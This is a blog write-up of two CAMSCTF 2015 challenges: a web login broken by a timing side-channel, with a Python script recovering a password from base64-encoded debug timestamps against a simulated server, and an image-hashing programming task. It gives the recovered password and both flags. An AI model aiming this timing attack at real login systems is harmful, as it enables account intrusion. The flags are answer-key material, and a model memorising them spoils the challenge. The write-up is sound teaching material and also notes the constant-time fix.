<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixptCV8LvuVhumThPstv4dsn9dmoo9IZv3FzrOQg6WQhR8Deg9KVn3-mQyo18q5ueLbIcOQ1aB3mzz2rMqZGkm_qkpxyu3nEPf-2fnuR112r1uQCzRewLmxmiw6AajSoAhMSm5B8Ils3VB/s1600/webB3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixptCV8LvuVhumThPstv4dsn9dmoo9IZv3FzrOQg6WQhR8Deg9KVn3-mQyo18q5ueLbIcOQ1aB3mzz2rMqZGkm_qkpxyu3nEPf-2fnuR112r1uQCzRewLmxmiw6AajSoAhMSm5B8Ils3VB/s1600/webB3.png" height="111" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Base64-decode the debug value to get a start time and an end time.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguT10O5MKiNF4IL1h5iOP0nZFQl4iHXqmZkzfOQseAFMNYhlx3zukQxc8dkz-l7HQE4ZT4BYyFpp2P0mXYNTE6RmmBJjPSIUTFgiOIGrq0Zd-C_U5BowFHeQpO_Ndl-Qt-6TWlRFx1KL6a/s1600/webB4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguT10O5MKiNF4IL1h5iOP0nZFQl4iHXqmZkzfOQseAFMNYhlx3zukQxc8dkz-l7HQE4ZT4BYyFpp2P0mXYNTE6RmmBJjPSIUTFgiOIGrq0Zd-C_U5BowFHeQpO_Ndl-Qt-6TWlRFx1KL6a/s1600/webB4.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
"Time": when I see this word, I think it must be about a <a href="https://www.owasp.org/images/c/cd/Side_Channel_Vulnerabilities.pdf">side-channel attack</a>; my solution is below.<br />
<br />
<script src="https://gist.github.com/icheernoom/0ffafcc13478f1e990bc.js"></script>
Then send password=<b>uHH>nN#)[Ks5v:E</b>&debug=1 to get the flag. :D<br />
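A worked illustration of the timing attack the steps above describe, added here as my own example; it is not the author's gist. The page only says the debug field base64-decodes to a start time and an end time, so the server side here is a constructed simulation: the debug format "start=&lt;us&gt;;end=&lt;us&gt;" and the per-character delay are assumptions, and a deterministic clock replaces real elapsed time so the leak is exact. Against the real target the oracle would POST password=&lt;candidate&gt;&amp;debug=1; network timing is noisy, so you would sample each candidate several times and compare medians rather than a single delta.

```python
import base64
import string

# Constructed stand-in for the challenge server. SECRET is the password the
# write-up recovered; the debug format is an assumption (the page only says
# it base64-decodes to a start and an end time).
SECRET = "uHH>nN#)[Ks5v:E"
CHARSET = string.printable.strip()  # printable ASCII without whitespace


class FakeClock:
    """Deterministic clock: each unit of server work advances it by step_us
    microseconds, so the timing signal is exact instead of noisy."""

    def __init__(self, step_us=1000):
        self.now_us = 1_000_000
        self.step_us = step_us

    def tick(self):
        self.now_us += self.step_us
        return self.now_us


def vulnerable_check(password, secret, clock):
    """Non-constant-time comparison: stops at the first wrong character, so
    the elapsed time grows with the length of the correct prefix.
    Returns (accepted, debug_b64), mimicking the challenge's debug=1 reply."""
    start = clock.tick()
    accepted = len(password) == len(secret)
    for i, ch in enumerate(password):
        if i >= len(secret) or ch != secret[i]:
            accepted = False
            break
        clock.tick()  # per-character work: this is what leaks
    end = clock.tick()
    debug = base64.b64encode(("start=%d;end=%d" % (start, end)).encode()).decode()
    return accepted, debug


def elapsed_us(debug_b64):
    """Decode the debug blob and return end - start in microseconds."""
    fields = dict(kv.split("=", 1)
                  for kv in base64.b64decode(debug_b64).decode().split(";"))
    return int(fields["end"]) - int(fields["start"])


def recover_password(oracle, charset=CHARSET, max_len=64):
    """oracle(candidate) -> (accepted, debug_b64). Grow the known prefix one
    character at a time, keeping the candidate the server spent longest on.
    Returns None if no password of at most max_len characters is accepted."""
    known = ""
    for _round in range(max_len):
        accepted, _dbg = oracle(known)
        if accepted:
            return known
        best_ch, best_t = None, -1
        for ch in charset:
            _ok, dbg = oracle(known + ch)
            t = elapsed_us(dbg)
            if t > best_t:
                best_ch, best_t = ch, t
        known += best_ch
    return None


if __name__ == "__main__":
    clock = FakeClock()
    found = recover_password(lambda p: vulnerable_check(p, SECRET, clock))
    print(found, found == SECRET)
```

With the fake clock a correct next character costs exactly one extra step, so one query per candidate is enough; the whole password needs about 15 rounds of 94 queries. The fix on the server side is a constant-time comparison (hash_equals() in PHP) and, of course, not exposing timestamps in a debug parameter.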
<br />
<b>Flag:</b> <b><span style="color: red;">{how_many_microseconds_did_i_waste_solving_this_0ne}</span></b><br />
<br />
<b>CAMSCTF CCTF 2015: Python 2 (Programming) Write-up</b> (published 2015-04-25T12:12:00.001+07:00, updated 2015-08-28T22:21:05.373+07:00)<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
1.) Take the RGB value of every pixel in one image.(Start at (0,0). Move down to (0,299). Go to (1,0). Move to (1,299). And so on. Read the files in numerical order.)<br />
2.) Add all of the R values, G values, and B values in each image. (Have one R sum, one B sum, one G sum for every image.)<br />
3.) Take these sums and convert them into strings. Take the MD5 hash of each string.<br />
4.) Concatenate these MD5 hashes into one string.<br />
5.) Take the MD5 hash of the new string.<br />
6.) Do this for every image and concatenate the final MD5 hashes into one string. (Image 1 final hash + Image 2 final hash + ...)<br />
7.) Take the MD5 of this string to get the flag.<br />
<u><a href="http://cdn.camsctf.com/?f=PIL.zip">PIL.zip</a></u></blockquote>
<br />
<b>Solution: </b><br />
<br />
<script src="https://gist.github.com/icheernoom/d977833d647491cf6f93.js"></script>
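The task's seven steps as one chain of functions, added here as my own example (the author's solution is the gist above, which is not reproduced). The PIL.zip images are not on the page, so two 2x2 images are constructed inline in a columns[x][y] layout; load_columns shows how a real file would be read with Pillow. Two details worth spelling out: the sums do not depend on the pixel walk order (addition commutes), and "numerical order" means sorting filenames by their number, not lexicographically, or 10.png lands before 2.png.

```python
import hashlib
import re


def md5_hex(s):
    """MD5 of a text string as lowercase hex, as every step of the task wants."""
    return hashlib.md5(s.encode()).hexdigest()


def numeric_order(paths):
    """'Read the files in numerical order': sort by the number in the name,
    not lexicographically (otherwise 10.png sorts before 2.png)."""
    return sorted(paths, key=lambda p: int(re.search(r"\d+", p).group()))


def rgb_sums(columns):
    """Steps 1-2. columns[x][y] is the (r, g, b) of pixel (x, y), so iterating
    column by column is the (0,0)..(0,299), (1,0)..(1,299) walk the task
    describes. Addition is order-independent, so the walk only matters for
    how the pixels are read, not for the resulting sums."""
    r = g = b = 0
    for column in columns:
        for pr, pg, pb in column:
            r += pr
            g += pg
            b += pb
    return r, g, b


def image_hash(columns):
    """Steps 3-5: md5 of each sum's decimal string, concatenated, then md5."""
    return md5_hex("".join(md5_hex(str(v)) for v in rgb_sums(columns)))


def flag_hash(images):
    """Steps 6-7: concatenate every image's hash in order and md5 the result."""
    return md5_hex("".join(image_hash(img) for img in images))


def load_columns(path):
    """Read a real image file into the columns layout (needs Pillow; not used
    by the offline demo below)."""
    from PIL import Image
    im = Image.open(path).convert("RGB")
    w, h = im.size
    return [[im.getpixel((x, y)) for y in range(h)] for x in range(w)]


# Constructed 2x2 sample images standing in for the PIL.zip files.
SAMPLE_A = [[(1, 2, 3), (4, 5, 6)], [(7, 8, 9), (10, 11, 12)]]     # sums 22, 26, 30
SAMPLE_B = [[(255, 0, 0), (0, 255, 0)], [(0, 0, 255), (1, 1, 1)]]  # sums 256, 256, 256

if __name__ == "__main__":
    # For the real challenge: images = [load_columns(p) for p in numeric_order(files)]
    print(flag_hash([SAMPLE_A, SAMPLE_B]))
```

Because the final digest chains every per-image hash in sequence, a single image read out of order changes the flag entirely, which is why the ordering rule in step 1 matters even though the per-image sums do not.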
<b>Flag:</b> <b><span style="color: red;">2d98c27f040ce429b35dd84124397f65</span></b>